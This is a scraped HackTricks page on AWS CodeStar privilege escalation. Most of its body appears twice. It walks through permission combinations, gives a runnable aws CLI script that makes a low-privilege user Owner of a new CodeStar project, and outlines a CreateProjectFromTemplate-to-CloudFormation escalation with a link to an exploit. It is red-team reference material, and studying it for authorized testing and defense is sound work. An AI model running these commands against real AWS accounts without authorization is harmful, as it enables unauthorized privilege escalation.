AWS - Codestar Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Codestar

You can find more information about codestar in:

codestar:CreateProject, codestar:AssociateTeamMember

`iam:PassRole`, `codestar:CreateProject`

With these permissions you can abuse a codestar IAM Role to perform arbitrary actions through a cloudformation template. Check the following page:

iam:PassRole, codestar:CreateProject

`codestar:CreateProject`, `codestar:AssociateTeamMember`

This technique uses codestar:CreateProject to create a codestar project, and codestar:AssociateTeamMember to make an IAM user the owner of a new CodeStar project, which will grant them a new policy with a few extra permissions.

PROJECT_NAME="supercodestar"

aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
    --name $PROJECT_NAME \
    --id $PROJECT_NAME 

echo "Waiting 1min to start the project"
sleep 60

USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
    --project-id $PROJECT_NAME \
    --user-arn "$USER_ARN" \
    --project-role "Owner" \
    --remote-access-allowed

If you are already a member of the project you can use the permission codestar:UpdateTeamMember to update your role to owner instead of codestar:AssociateTeamMember

Potential Impact: Privesc to the codestar policy generated. You can find an example of that policy in:

codestar:CreateProject, codestar:AssociateTeamMember

`codestar:CreateProjectFromTemplate`

Create a New Project:
- Utilize the codestar:CreateProjectFromTemplate action to initiate the creation of a new project.
  - Upon successful creation, access is automatically granted for cloudformation:UpdateStack.
  - This access specifically targets a stack associated with the CodeStarWorker-<generic project name>-CloudFormation IAM role.
Update the Target Stack:
- With the granted CloudFormation permissions, proceed to update the specified stack.
  - The stack's name will typically conform to one of two patterns:
    awscodestar-<generic project name>-infrastructure
    awscodestar-<generic project name>-lambda
    The exact name depends on the chosen template (referencing the example exploit script).
Access and Permissions:
- Post-update, you obtain the capabilities assigned to the CloudFormation IAM role linked with the stack.
- Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.

For more information check the original research: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/. You can find the exploit in https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py

Potential Impact: Privesc to cloudformation IAM role.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Codepipeline Privesc Nextcodestar:CreateProject, codestar:AssociateTeamMember

Last updated 4 months ago

Codestar

You can find more information about codestar in:

codestar:CreateProject, codestar:AssociateTeamMember

iam:PassRole, codestar:CreateProject

With these permissions you can abuse a codestar IAM Role to perform arbitrary actions through a cloudformation template. Check the following page:

iam:PassRole, codestar:CreateProject

codestar:CreateProject, codestar:AssociateTeamMember

PROJECT_NAME="supercodestar"

aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
    --name $PROJECT_NAME \
    --id $PROJECT_NAME 

echo "Waiting 1min to start the project"
sleep 60

USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
    --project-id $PROJECT_NAME \
    --user-arn "$USER_ARN" \
    --project-role "Owner" \
    --remote-access-allowed

If you are already a member of the project you can use the permission codestar:UpdateTeamMember to update your role to owner instead of codestar:AssociateTeamMember

Potential Impact: Privesc to the codestar policy generated. You can find an example of that policy in:

codestar:CreateProject, codestar:AssociateTeamMember

codestar:CreateProjectFromTemplate

Create a New Project:

Utilize the codestar:CreateProjectFromTemplate action to initiate the creation of a new project.
- Upon successful creation, access is automatically granted for cloudformation:UpdateStack.
- This access specifically targets a stack associated with the CodeStarWorker-<generic project name>-CloudFormation IAM role.

Update the Target Stack:

With the granted CloudFormation permissions, proceed to update the specified stack.
- The stack's name will typically conform to one of two patterns:
  - awscodestar-<generic project name>-infrastructure
  - awscodestar-<generic project name>-lambda
  - The exact name depends on the chosen template (referencing the example exploit script).

Access and Permissions:

Post-update, you obtain the capabilities assigned to the CloudFormation IAM role linked with the stack.
Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.

Potential Impact: Privesc to cloudformation IAM role.